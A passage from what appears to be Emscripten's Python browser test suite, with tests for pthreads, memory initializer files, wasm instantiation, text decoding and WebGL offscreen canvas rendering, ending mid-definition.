# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1'], also_asmjs=True)
# Test the -s PTHREAD_HINT_NUM_CORES=x command line variable.
@requires_threads
def test_pthread_num_logical_cores(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_HINT_NUM_CORES=2'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
# Test that --separate-asm works with -s USE_PTHREADS=1.
@no_wasm_backend('asm.js')
@requires_threads
def test_pthread_separate_asm_pthreads(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'] + modularize)
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
self.clear()
os.makedirs('cdn')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
if self.is_wasm_backend():
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
for args in [['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(path_from_root('tests', 'pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'TOTAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME=1'], also_asmjs=True)
# Test that STACK_BASE and STACK_MAX correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS', '-std=c++11'])
# Test that real `thread_local` works.
@no_fastcomp('thread_local is only supported on WASM backend')
@requires_threads
def test_pthread_tls(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-std=c++11'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@no_fastcomp('thread_local is only supported on WASM backend')
@requires_threads
def test_pthread_tls_main(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS', '-std=c++11'])
@no_fastcomp('-s SAFE_STACK is only supported on WASM backend')
@requires_threads
def test_pthread_safe_stack(self):
self.btest(path_from_root('tests', 'core', 'test_safe_stack.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'SAFE_STACK', '-s', 'DEFAULT_PTHREAD_STACK_SIZE=64KB', '--pre-js', path_from_root('tests', 'pthread', 'test_safe_stack.js')])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@no_fastcomp('LSan is only supported on WASM backend')
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@no_fastcomp('ASan is only supported on WASM backend')
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@no_fastcomp('ASan is only supported on WASM backend')
def test_pthread_asan_use_after_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.js')])
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
@no_wasm_backend('MAIN_THREAD_EM_ASM() not yet implemented in Wasm backend')
def test_main_thread_em_asm_signatures(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@no_wasm_backend('MAIN_THREAD_EM_ASM() not yet implemented in Wasm backend')
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'ASSERTIONS=1'])
# test atomicrmw i64
@no_wasm_backend('uses an asm.js .ll file')
@requires_threads
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0'])
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'])
@no_wasm_backend('mem init file')
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
@no_wasm_backend('mem init file')
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)] * 256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
@no_wasm_backend('asm.js')
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.html', '-s', 'WASM=0'] + opts)
self.run_browser('test.html', None, '/report_result?0')
print('run one')
create_test_file('one.html', '<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
print('run two')
run_process([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js'])
create_test_file('two.html', '''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
print('run hello world')
self.clear()
assert not os.path.exists('tests.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['-s', 'WASM=0', '--separate-asm'])
self.assertExists('test.asm.js')
os.unlink('test.asm.js')
print('see a fail')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
@no_wasm_backend('emterpretify - bytecode in a file')
def test_emterpretify_file(self):
create_test_file('shell.html', '''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
self.assertExists('code.dat')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
self.assertExists('code.dat')
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
@no_wasm_backend('mem init file')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(os.path.join(path_from_root('tests/manual_wasm_instantiate.cpp'))).read()))
self.compile_btest(['src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_binaryen_worker(self):
self.do_test_worker(['-s', 'WASM=1'])
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
self.clear()
os.makedirs('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=1', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
@no_fastcomp('not optimized in fastcomp')
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure', '1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 6050), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
self.skipTest('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1'])
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'USE_WEBGL2=0', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# VAO path on WebGL 1.0
['-s', 'USE_WEBGL2=0'],
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'USE_WEBGL2=1'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1']
if asyncify:
if not self.is_wasm_backend():
continue
# given the synchronous render loop here, asyncify is needed to see intermediate frames and the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
